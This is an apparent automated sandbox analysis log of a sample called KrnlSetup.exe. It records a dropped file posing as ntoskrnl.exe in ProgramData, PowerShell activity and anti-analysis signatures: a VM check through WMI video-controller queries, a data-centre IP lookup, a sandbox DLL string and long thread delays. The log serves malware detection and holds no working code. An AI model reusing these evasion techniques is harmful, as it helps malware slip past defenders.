                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\ntoskrnl.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Check if machine is in data center or colocation facility
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                    Source: KrnlSetup.exe, 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                    Source: KrnlSetup.exe, ntoskrnl.exe.0.drBinary or memory string: SBIEDLL.DLLWFMVQB4BADTHHZBRNHGHDUHJFYSZHKETVHCSSSATMTN9WADPHBPKZX2YZI09S7BZVFOPQ5KXS6F5JVGUJBPEHRAZWZLHR8NLFLPPRIJU6AA0MZI2PE6XVXEAVZEUAJEXUOMCWFI17EKC5GPC75SNYL7KEFIHGXCXLUR2QJPV7WPFALRXWCY0WEMFP80UILN9P9N01OGLKBNEQPKOLBWQNAFHQCROWT6XOFPSMNHDLXHSKXHJLLRENYEWIL7Q9SOTYSUXOLN6W4KQKHGVXGWMQMISNMNGIAN9A1AUIJRJX7ZOHCSASGBGW7WOGAXYCXEVM6SQHCDR6GI3BB3CLZXZJZHWHNE4QYIFWOH2XUDISWBMSNPOX7QEHXA28EK9ANGLWPVQDFNON1PIWHSMMJ4JIHGRAAIG0JM1EXKFC4WB5VQV1VNBZXHGUEXFWKNKRLJEGQXM4WYT1LULSJFAKMAOIVZBUYQI9BCNT1BJW312PMCJOMLBHYETA24AHMG7YCPHZ9QFHWHWCCTVQNPUWRQDIYSN8XRL7ZILBQZCCZXZ5OMZIHJCP8HPJKCMEHUZWAEZM0QV2YF5RONDEW4HBXUGFPBARVRWPVKFVNWA5RS5W6C18NTPCLIKICY9LCH3LMRHHEAYFQPSTSNZSNCQNIJU9WZ4QOG6AEER8JHUUFIQA0LBRWITJINFO
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeMemory allocated: 1A4C0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 820000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 1A340000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 520000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 1A450000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 9E0000 memory reserve | memory write watch
                                    Source: C:\ProgramData\ntoskrnl.exeMemory allocated: 1A620000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599891Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599781Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599672Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599562Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599452Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599344Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599234Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599125Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599015Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598906Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598756Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598638Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598511Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598385Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598266Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598141Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597990Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597859Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597750Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597641Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597531Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597422Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597313Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597188Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597078Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596969Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596844Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596735Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596610Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596485Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596360Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596235Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596110Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595964Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595781Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595656Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595523Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595406Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595296Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\ntoskrnl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\ntoskrnl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\ntoskrnl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeWindow / User API: threadDelayed 3219Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeWindow / User API: threadDelayed 6594Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5914Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3919Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6693Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2955Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8172Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1446Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8124
